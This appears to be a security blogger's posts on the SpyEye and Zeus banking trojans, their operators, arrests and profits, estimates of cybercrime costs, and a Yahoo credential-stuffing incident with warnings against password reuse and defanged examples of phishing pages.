In the RSA 2012 Cybercrime Trends Report the number one Trend predicted as 2012 began was "Trojan Wars Continue, but Zeus will Prevail as the Top Financial Malware". RSA reports that in Q1 of 2011 SpyEye accounted for 19% of all malware infections, but had dropped to 4% by Q3 of 2011. What happened? Refer back to the S21 Timeline. See the Black Line representing the theft of the Zeus Source Code? Now it didn't matter that SpyEye was cheaper than Zeus, because Zeus was suddenly FREE! Ice IX was the first Trojan that came out that took advantage of the leaked Zeus 2.0 code and began to show significant improvements. Free is good, but Free without a code innovator who knew how to make creative advances in his malware meant that the Free version of Zeus 2.0 was soon obsolete. Ice IX grew to 13% of the financial crimeware market by Q4 2011, according to RSA. It should be noted that the prices in the 2012 RSA report are much higher than the 2010 prices above. RSA says that the full version of SpyEye cost $4,000 compared to the Zeus cost of $10,000. The other big trend that RSA mentioned in this report was Trend #2: Cybercriminals will Find New Ways to Monetize Non-Financial Data -- including Access to victim computers, access to Utility bills, Medical Records, Email addresses, DOBs, and much more. Also worth noting that in the 2012 RSA Report, RSA was claiming that every MINUTE there were 232 computers somewhere in the world infected by malware. Norton's 2013 report puts that number at 18 per second or 1,080 per minute. If equivalent, that would mean an almost a 460% increase in malware infections from 2012 to 2013!

Soldier = a Major SpyEye Customer

Perhaps the largest USER of SpyEye was a hacker named "Soldier" who was reported on by the Trend Micro team of Loucif Kharouni, Kevin Stevens, Nart Villeneuve, and Ivan Macalintal called "From Russia to Hollywood: Turning the Tables on a SpyEye Cybercrime Ring". Each SpyEye Builder has a GUID (Globally Unique Identifier) assigned to it at the time of the sale. In the Trend research paper, 23 Command & Control (C&C) Servers were identified as corresponding to SpyEye samples that had the GUID associated with Soldier. from April 19, 2011 to June 29, 2011, these C&C servers were visited from 82,999 unique IP addresses, and resulted in 25,394 systems being compromised. Of those, 23,739 were in the United States. The second most common country was the United Kingdom with only 86 compromised systems. Soldier's servers included credentials stolen from 1499 Chase customers, 770 Wells Fargo customers, and 1283 Bank of America customers. From the NON-Banking information, there were 21,819 Facebook accounts, 9,987 Yahoo! accounts, 8,078 Google accounts, and 4500 Live.com accounts.

Soldier also ran a significant Money Mule network, which recruited people through many fake job placements websites, including one called L&O. By identifying Mules and working through the Mule website, Trend researchers were able to determine the earnings per month laundered as part of the take by Soldier - more than $4.5 MILLION dollars in six months!

• November 2010 - $576,000
• December 2010 - $809,000
• January 2011 - $843,000
• February 2011 - $719,000
• March 2011 - $957,000
• April 2011 - $763,000
• May 2011 - $53,000

While it is not known if SOLDIER was brought to justice -- Bx1 may still turn out to BE "Soldier" -- that part is unclear at this time, other SpyEye operators were. One such group was arrested by the Metropolitan Police Central e-Crime Unit (PCeU). PCeU arrested Pavel Cyganok, from Lithuania, sentenced to five years for his role in stealing more than £100,000 and Ilja Zakrevski, his accomplice from Estonia who was sentenced to four years. The two worked with Aldis Krummins from Latvia who was only charged with Money Laundering and sentenced to two years. Charged under the UK's Computer Misuse Act, one of their servers hosted in the UK was shown to have been connected to and receiving data from at least 1,000 compromised computers around the world. In the PCeU's 2012 Report to Parliament this £100,000 figure for the SpyEye operators had to be compared to a single Organised Criminal Group that had been operating Zeus that had stolen more than $70 Million from the USA alone! But, just like in the US, crimes against victims in other countries aren't considered in the local jurisdiction. This loss volume was really hardly mentioned in the UK press. 285 UK Citizens were shown to have lost £2.66 million in just a single 90 day period from Zeus. (This was the case that was referred to by the FBI as "Operation Trident BreACH".) At that time, this researcher really was thinking of SpyEye in a similar way -- SpyEye £100,000 UK Pounds vs. Zeus at $70 Million US Dollars. But there were bigger SpyEye operators still to be identified.

So while we know have Aleksander Panin AKA Harderman AKA Gribodemon was the author of SpyEye, and we know that BX1 was the primary person in charge of marketing the malware to clients, much as "Magic" did for monstr on the Zeus side of the house. What we do NOT have are more examples of the criminals who actually ran the botnets and whether they are in custody. Beyond Soldier (still at large) and the Latvian/Estonian/Lithuanian trio above, we know that The claim is made that at least 150 different criminals bought a copy of SpyEye from BX1. Where are they, their botnets, and the money that they made from the victims they provided with Zeus and/or SpyEye by stealing banking information and selling personal information and documents to their clients?

Perhaps more of those individuals will be found among the John Does 1-39 listed in the Microsoft Lawsuits against Zeus actors. In the Zeus Lawsuit papers, including the Declaration of Mark Debenham (179 page PDF) Some of the named John Does include Monstr (the original Zeus author), Harderman and Gribodemon (both now known to be Panin, who Microsoft referred to as "John Doe 3") and 36 other individuals, many as yet unnamed, who may turn out to be Soldier or other SpyEye customers.

Great work! But we need to do the ADDITIONAL work of identifying and removing those underlings as well.

An aside on CyberCrime Reporting

Quite a range, both in estimates and in methodologies. For example:

• the Ponemon Institute's Cost of Cyber Crime 2013 study estimated the cost of cybercrime in 60 benchmarked companies as being $11.6 million per year per company, with malware attacks being most prevalent, followed by DDOS. Ponemon also points out that the category of security spending with the greatest ROI is "Security Intelligence" and really offers a very interesting view of how to properly measure costs, consequences, and opportunities in cybercrime mitigation efforts.
• The 2012 Norton Cybercrime Report put the global cost of Cybercrime at $110 Billion per year, with $21 Billion of that cost being in the United States.
• I've previously blogged about another great report estimating Cyber Crime costs by the UK Government -- a study conducted by Detica for the Office of Cyber Security and Information Assurance. In my blog post, UK Government counts the Cost of Cybercrime I project that if the US Economy experienced cybercrime in the same ratio as the UK Economy, our cost would be $275 Billion per year.
• More details about the "Trillion Dollar Cost" of CyberCrime, a totally bogus number that is easy to find in the Congressional Record, can be found in another blog post where I once more praised the UK on their efforts to assign costs to Cybercrime, Sir Paul Speaks the Truth: Cyber Law Enforcement is a Good Investment in which Metropolitan Police chief Sir Paul Stephenson tells us "It has been estimated that for every £1 spent on the Virtual Task Force, it has prevented £21 in theft" which is a remarkable return on investment that I would hope to see us emulate in the United States!

Hilary Kneber Malware Domains

(click image to visit Yahoo! blogpost)

Is Yahoo a breach victim? or a champion?

While we don't know how they discovered this, the typical methods for discover would be some form of network analytics showing single IP addresses or sessions attempting to access multiple Yahoo email accounts in rapid succession, or, based on the keyword "effort", possibly attempting and failing generating a large number of password guesses. Like most Email Service Providers, Yahoo! retains records of which IP addresses have previously succeeded to access your email account, and a sudden spike in "wrong address / wrong device / wrong geography" alerts may be part of what led to the conclusion this was a coordinated effort.

While everyone is raging at Yahoo!, I believe that in this situation Yahoo! is providing a well-intentioned public service that actually reveals a pro-security stance in the company, NOT a weak security status! Read on to see why.

Password Re-Use is the Problem

(Quote): Based on our current findings, the list of usernames and passwords that were used to execute the attack was likely collected from a third-party database compromise. We have no evidence that they were obtained directly from Yahoo's systems.(/Quote)

On face value many are jumping to the conclusion that this indicates that Yahoo! is allowing some third party to store userids and passwords of Yahoo! users on their systems. Again, as an outsider sharing my reasoning on this event, I don't believe that is what is being said. PASSWORD RE-USE IS REACHING CRISIS LEVELS!. Oops? Did I scream that? I guess I did! The problem that I believe we are dealing with here is that many systems on the Internet ask you to use your EMAIL ADDRESS as your UserID on their system. This is a great convenience in many ways, however, in this case, it also means that a criminal now can associate your userid on one system in a very direct way to your userid on your email provider's system. MORE THAN 81 MILLION AMERICANS (and more than 200 Million people worldwide) still use a Yahoo! email account! This means that in any breach on any system where your userid is equal to your email account, there is a very great chance that the primary accounts found in that breach would be Yahoo email accounts. Despite repeated warnings, most users still use the same password on ALL of their systems. Because of this, it is logical for a criminal who obtains userids and passwords from ANY source to try those same userids and passwords at Yahoo against the matching email account.

What is the Criminals' End-Game?

If someone is using the same userid and password on multiple systems, it is likely they are doing so on many ADDITIONAL systems as well. By reading the recent emails found in the Inbox and Sent mail, the criminals are likely able to determine other places where the Yahoo email user has additional accounts. For example, when I make a purchase on Amazon.com, BestBuy.com, Delta.com or pay my credit card bill at Citibank.com or BankofAmerica.com what happens? They send a confirmation of my purchase (or my statement) to my email account. If a criminal knew that information, they would be able to then try that same Yahoo email account as the userid and password and attempt to access those other accounts. In addition, how do ALL of those service confirm a password reset account? Through an email message with a "click to change your password" link. Since the criminal now has control of your Yahoo account, even if you DID use a different password, they can now reset it at will!

Of course there is also the possibility that they are just after "London traveler" type scams where knowledge of the individuals in your address book is used to send personal pleas for financial assistance due to some type of crisis. We've covered those types of scams since at least 2009 in this blog. The more recent social engineering attacks that we've heard of have been searching the compromised accounts for evidence of communications with bankers and then using the knowledge of the previous conversation to ask for financial favors or skirting of the rules to help perform a financial transaction via email.

How is Yahoo Protecting their Customers?

(Quote:)
• We are resetting passwords on impacted accounts and we are using second sign-in verification to allow users to re-secure their accounts. Impacted users will be prompted (if not, already) to change their password and may receive an email notification or an SMS text if they have added a mobile number to their account.
• We are working with federal law enforcement to find and prosecute the perpetrators responsible for this attack.
• We have implemented additional measures to block attacks against Yahoo’s systems.

(/QUOTE)

In the Safeguarding Your Yahoo! Account document, I'd like to call special attention to their recommendation to having an alternative email and mobile phone on file with Yahoo. This isn't so they can violate your privacy. It is so they can better protect your account! I've used this service myself from Yahoo within the past two weeks and was very pleased that they texted a password reset code to my cell phone before allowing a password change request to continue.

High praise to Yahoo! for recommending that you enable a mobile-phone based password reset. I wish my banks and credit card issuers would require the same! This isn't an example of Yahoo! being a security victim, but being a security LEADER! It is shameful that my Yahoo! email account is better protected than many other accounts! (Test your own accounts: Can you click an "I Forgot My Password" link on your bank/electronics/music website to reset your password by email? )

Breaches, Phishing, It doesn't matter ... DO NOT RE-USE PASSWORDS!

• BT Internet Phish:

  In this long-running phishing campaign, users of Yahoo's "BTInternet.com" email domain are told that BT Broadband (formerly British Telecom) is discontinuing their email account and will replace it with a Premium Email account that they have to pay for, unless they confirm they want to keep the account by entering their email userid and password to prove they are really in control of the account.

  (This phishing screenshot was captured by Malcovery January 23, 2014 from dtinternet[.]bug3[.]com)

• Google Docs Phish:

  Although this phish claims to be from Google Docs, this scam campaign began its life as a ReMax realty phish. In order to confirm your identity, you are asked to provide the userid and password of whichever popular email service you are using. From there the threats are similar to those described above.

  (This phishing screenshot was captured by Malcovery January 29, 2014 from www[.]thewigleygroup[.]com/googledocss/sss/)

• GT Bank / Yahoo! Phish:

  GT Bank is Guaranty Trust Bank plc, a pan-African bank with Nigerian roots. In this example, the phishing target is actually Yahoo, but since the phish was created by someone logging in from Africa, the Yahoo! page they captured is adorned with a GTBank logo and advertisement.

  (This particular phishing screenshot was captured by Malcovery January 22, 2014 from highbeam[.]co[.]th/eart/Indezx.html)